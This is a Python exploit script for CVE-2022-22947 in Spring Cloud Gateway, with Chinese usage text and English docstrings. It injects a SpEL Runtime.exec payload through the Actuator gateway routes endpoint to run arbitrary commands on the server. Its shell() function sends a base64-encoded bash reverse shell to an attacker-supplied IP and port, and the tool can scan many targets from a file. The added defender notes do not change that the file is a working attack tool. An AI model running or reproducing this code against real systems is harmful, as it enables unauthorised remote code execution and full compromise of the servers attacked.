# CVE-2022-22947: Spring Cloud Gateway remote code execution (SpEL injection via the Actuator gateway endpoint)
import requests
import json
import sys
import base64
import argparse
import re
# Actuator gateway endpoint paths used by the request chain below.
# Every step targets the route id "hacktest"; from a monitoring standpoint,
# POST/GET/DELETE traffic to /actuator/gateway/routes/<id> followed by
# POST /actuator/gateway/refresh from an untrusted client is the visible signature.
url1='/actuator/gateway/routes/hacktest'   # POST: create the route definition
url2='/actuator/gateway/refresh'           # POST: apply the new route
url3='/actuator/gateway/routes/hacktest'   # GET: read the route back (same path as url1)
url4='/actuator/gateway/routes/hacktest'   # DELETE: remove the route (same path as url1)
url5='/actuator/gateway/refresh'           # POST: apply the removal (same path as url2)
# Headers for the route-creation request (JSON body).
headers1={
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Connection': 'close',
'Content-Type': 'application/json'
}
# Headers for the refresh / read / delete requests (no JSON body).
headers2={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
}
def poc(uurl: str, cmd: str, files) -> None:
    """Check one target for CVE-2022-22947 and print what the GET step returns.

    Request sequence (five HTTP calls, all against ``uurl``):
    1. POST url1  - creates a route whose AddResponseHeader filter value is a
       SpEL expression wrapping ``cmd`` (this is the injection point the CVE
       describes; a patched/hardened gateway does not evaluate it).
    2. POST url2  - refresh so the route is loaded.
    3. GET  url3  - reads the route back; the response text is parsed below.
    4. DELETE url4, 5. POST url5 - removes the route and refreshes again.

    Args:
        uurl:  Base URL without a trailing slash (callers strip it).
        cmd:   Command string to embed; base64-encoded before being placed
               in the SpEL expression.
        files: Optional output file name; when truthy, each parsed result
               line is appended to it.

    Returns:
        None. Results are printed (and optionally appended to ``files``).

    Raises:
        requests exceptions on connection/timeout failures (no handling here);
        AttributeError if ``cmd`` is None (``cmd.encode`` below).

    Mitigation reminder for defenders: the chain only works when the Actuator
    gateway endpoint is reachable and writable; restricting/disabling it and
    running a patched release removes the exposure.
    """
    #uurl="http://192.168.56.222:8080"
    # cmd="ls -la"
    cmd = cmd.encode('utf-8')
    # str(bytes) gives "b'...'", so the b and quotes are stripped afterwards.
    cmd = str(base64.b64encode(cmd))
    cmd = cmd.strip('b')
    cmd = cmd.strip("'")
    cmd = 'bash -c {echo,' + cmd + '}|{base64,-d}|{bash,-i}'
    # Route definition; the "value" field is the SpEL expression evaluated server-side.
    # Detection hint: a route filter arg containing "#{" and "T(java.lang.Runtime)" is
    # never legitimate in normal gateway configuration traffic.
    payload = {
        "id": "code",
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\").getInputStream()))}"
            }
        }],
        "uri": "http://example.com",
        "order": 0
    }
    # verify=False disables TLS certificate verification for this request.
    # Both data= and json= are passed; requests sends the data= body when data is set.
    response1 = requests.post(url=uurl + url1, headers=headers1, data=json.dumps(payload,ensure_ascii=False), json=json,timeout=5,verify=False)
    response2 = requests.post(url=uurl+url2,headers=headers2,timeout=5)
    response3 = requests.get(url=uurl+url3,headers=headers2,timeout=5)
    response4 = requests.delete(url=uurl+url4,headers=headers2,timeout=5)
    response5 = requests.post(url=uurl+url5,headers=headers2,timeout=5)
    # Only the GET response body is inspected; the others are discarded.
    c=response3.text
    # Extract every single-quoted substring from the route JSON returned by the GET.
    pattern = r"'([^']*)'"
    matches = re.findall(pattern,c)
    for match in matches:
        # Drops the last two characters of each match before reporting.
        result=match[:-2]
        if files:
            with open(f'{files}','a') as f:
                f.write(result+'\n')
        print(result)
def shell(uurl: str, ip: str, prot: str) -> None:
    """Same five-request chain as ``poc`` but with a reverse-shell command and no output parsing.

    Args:
        uurl: Base URL without a trailing slash.
        ip:   Address placed in the ``/dev/tcp/{ip}/{prot}`` redirection.
        prot: Port for the same redirection (the parameter is a port despite
              its name; it mirrors the ``-p/--prot`` CLI flag).

    Returns:
        None. No response is read or printed.

    Raises:
        requests exceptions on connection failures; note that the refresh /
        GET / DELETE requests below carry no timeout, so they can block.

    Defender note: from the gateway's side this is indistinguishable from
    ``poc`` - the same endpoints, the same route id and the same SpEL shape;
    the outbound TCP connection from the gateway host is the additional signal.
    """
    sh = f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
    data1 = sh.encode('utf-8')
    encoded_data = base64.b64encode(data1)
    encoded_sh = encoded_data.decode('utf-8')
    # "123" is a placeholder swapped for the base64 payload on the next line.
    shel = 'bash -c {echo,123}|{base64,-d}|{bash,-i}'
    cmd = shel.replace("123", encoded_sh)
    # Route definition identical in shape to the one in poc().
    payload = {
        "id": "code",
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\").getInputStream()))}"
            }
        }],
        "uri": "http://example.com",
        "order": 0
    }
    # verify=False disables TLS certificate verification; only this request has a timeout.
    response1 = requests.post(url=uurl+url1,headers=headers1,data=json.dumps(payload,ensure_ascii=False),json=json,timeout=5,verify=False)
    response2 = requests.post(url=uurl + url2, headers=headers2)
    response3 = requests.get(url=uurl + url3, headers=headers2)
    response4 = requests.delete(url=uurl + url4, headers=headers2)
    response5 = requests.post(url=uurl + url5, headers=headers2)
def main() -> None:
    """Parse the command line and dispatch to ``shell`` or ``poc``.

    Dispatch order (first match wins):
    - ``-u`` with ``-i`` and ``-p``  -> shell(url, ip, port)
    - ``-u`` alone                   -> poc(url, cmd, files)
    - ``-t``                         -> poc() once per line of the given file
    - ``-j``                         -> only prints the value
    - otherwise                      -> prints a hint to use -h

    NOTE(review): ``-c`` is not enforced, so ``-u`` without ``-c`` passes
    ``cmd=None`` into poc(), which fails at ``cmd.encode``.
    NOTE(review): ``-j/--jj`` reuses the ``-i`` help text and is only echoed
    back; the commented-out line below is the only other reference to it.
    """
    # The usage text is passed as the parser's prog name (first positional
    # argument of ArgumentParser), which is why it shows up in -h output.
    parser=argparse.ArgumentParser('''
验证单个目标:
1、python CVE-2022-22947-exp.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python CVE-2022-22947-exp.py -u http://example.com -c whoami
验证多个目标
1、python CVE-2022-22947-exp.py -t url.txt ,将需要验证的目标全部放在exp同一目录下
导出结果到文档
1、python CVE-2022-22947-exp.py -u http://example.com -c whoami // -t url.txt -f result.txt ,将结果导出到指定文件
反弹shell
1、python CVE-2022-22947-exp.py -u http://example.com -i 192.168.1.1 -p 1234
''')
    parser.add_argument('-c','--cmd',dest='cmd',help='输入命令')
    parser.add_argument('-u','--url',dest='url',help='输入url')
    parser.add_argument('-t','--txt',dest='txt',help='请输入批量验证的文本名称')
    parser.add_argument('-f','--files',dest='files',help='请输入结果导出的文本名称')
    parser.add_argument('-p','--prot',dest='prot',help="输入反弹端口")
    parser.add_argument('-i','--ip',dest='ip',help='输入反弹ip')
    parser.add_argument('-j', '--jj', dest='jj', help='输入反弹ip')
    parser.add_argument('-V','--version',action='version',version='%(prog)s xiaoxin 1.0')
    args=parser.parse_args()
    url=args.url
    #cmd=args.cmd+args.jj
    # Trailing slashes are stripped because the endpoint paths above start with '/'.
    if args.url and args.ip and args.prot:
        shell(url.strip('/'),args.ip,args.prot)
    elif args.url:
        poc(url.strip('/'),args.cmd,args.files)
    elif args.txt:
        # One target URL per line; whitespace and trailing '/' are removed.
        with open(f'{args.txt}','r') as urls:
            for url in urls:
                poc(url.strip().strip('/'),args.cmd,args.files)
    elif args.jj:
        print(args.jj)
    else:
        print("-h 帮助信息")
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()